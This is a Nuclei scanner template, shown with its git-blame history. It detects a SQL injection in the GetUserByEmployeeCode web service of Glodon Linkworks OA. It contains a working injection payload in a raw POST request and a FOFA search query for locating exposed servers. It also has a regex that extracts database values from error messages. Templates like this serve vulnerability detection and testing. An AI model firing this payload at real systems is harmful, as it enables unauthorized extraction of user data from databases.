nuclei-templates/http/vulnerabilities/other/glodon-linkworks-sqli.yaml

id: glodon-linkworks-sqli

info:
  name: Glodon Linkworks GWGdWebService - SQL injection
  author: DhiyaneshDK
  severity: high
  description: |
    There is a SQL injection vulnerability in the GWGdWebService interface of Glodon Linkworks office OA. Sensitive information in the database can be obtained after sending a request package.
  reference:
    - https://github.com/zan8in/pocwiki/blob/main/%E5%B9%BF%E8%81%94%E8%BE%BE-linkworks-gwgdwebservice%E5%AD%98%E5%9C%A8SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
  metadata:
    verified: true
    max-request: 1
    fofa-query: banner="Services/Identification/login.ashx"
  tags: glodon,linkworks,sqli

http:
  - raw:
      - |
        POST /Org/service/Service.asmx/GetUserByEmployeeCode HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        employeeCode=1'-1/user--'&EncryptData=1

    matchers:
      - type: dsl
        dsl:
          - 'status_code==500'
          - 'contains_any(header, "text/html", "text/plain")'
          - 'contains_all(body, "在将 nvarchar 值", "转换成数据类型 int 时失败")'
        condition: and

    extractors:
      - type: regex
        part: body
        group: 1
        regex:
          - '在将 nvarchar 值 &#39;(.*)&#39; 转换成数据类型 int 时失败。'
# digest: 4a0a004730450221008ce688c7919d576b9c147ef7f0695c1581baa78bdd6e49403c3438c001b9c3c802202e786a6bf132bcabdd1c7d1b5052739c4ac94bdae01a558bfcd28515981a9481:922c64590222798bb761d5b6d8e72950
Create glodon-linkworks-sqli.yaml 2024-02-19 03:09:57 +00:00			`id: glodon-linkworks-sqli`

			`info:`
added matchers & fofa-query 2024-02-19 18:35:49 +00:00			`name: Glodon Linkworks GWGdWebService - SQL injection`
Create glodon-linkworks-sqli.yaml 2024-02-19 03:09:57 +00:00			`author: DhiyaneshDK`
			`severity: high`
			`description: \|`
			`There is a SQL injection vulnerability in the GWGdWebService interface of Glodon Linkworks office OA. Sensitive information in the database can be obtained after sending a request package.`
			`reference:`
			`- https://github.com/zan8in/pocwiki/blob/main/%E5%B9%BF%E8%81%94%E8%BE%BE-linkworks-gwgdwebservice%E5%AD%98%E5%9C%A8SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md`
			`metadata:`
			`verified: true`
TemplateMan Update [Sat Mar 23 09:28:19 UTC 2024] :robot: 2024-03-23 09:28:19 +00:00			`max-request: 1`
added matchers & fofa-query 2024-02-19 18:35:49 +00:00			`fofa-query: banner="Services/Identification/login.ashx"`
Create glodon-linkworks-sqli.yaml 2024-02-19 03:09:57 +00:00			`tags: glodon,linkworks,sqli`

			`http:`
			`- raw:`
			`- \|`
			`POST /Org/service/Service.asmx/GetUserByEmployeeCode HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`

			`employeeCode=1'-1/user--'&EncryptData=1`

added matchers & fofa-query 2024-02-19 18:35:49 +00:00			`matchers:`
			`- type: dsl`
			`dsl:`
			`- 'status_code==500'`
			`- 'contains_any(header, "text/html", "text/plain")'`
			`- 'contains_all(body, "在将 nvarchar 值", "转换成数据类型 int 时失败")'`
			`condition: and`

Create glodon-linkworks-sqli.yaml 2024-02-19 03:09:57 +00:00			`extractors:`
			`- type: regex`
			`part: body`
			`group: 1`
			`regex:`
			`- '在将 nvarchar 值 '(.*)' 转换成数据类型 int 时失败。'`
Auto Template Signing [Mon Mar 25 11:57:16 UTC 2024] :robot: 2024-03-25 11:57:16 +00:00			`# digest: 4a0a004730450221008ce688c7919d576b9c147ef7f0695c1581baa78bdd6e49403c3438c001b9c3c802202e786a6bf132bcabdd1c7d1b5052739c4ac94bdae01a558bfcd28515981a9481:922c64590222798bb761d5b6d8e72950`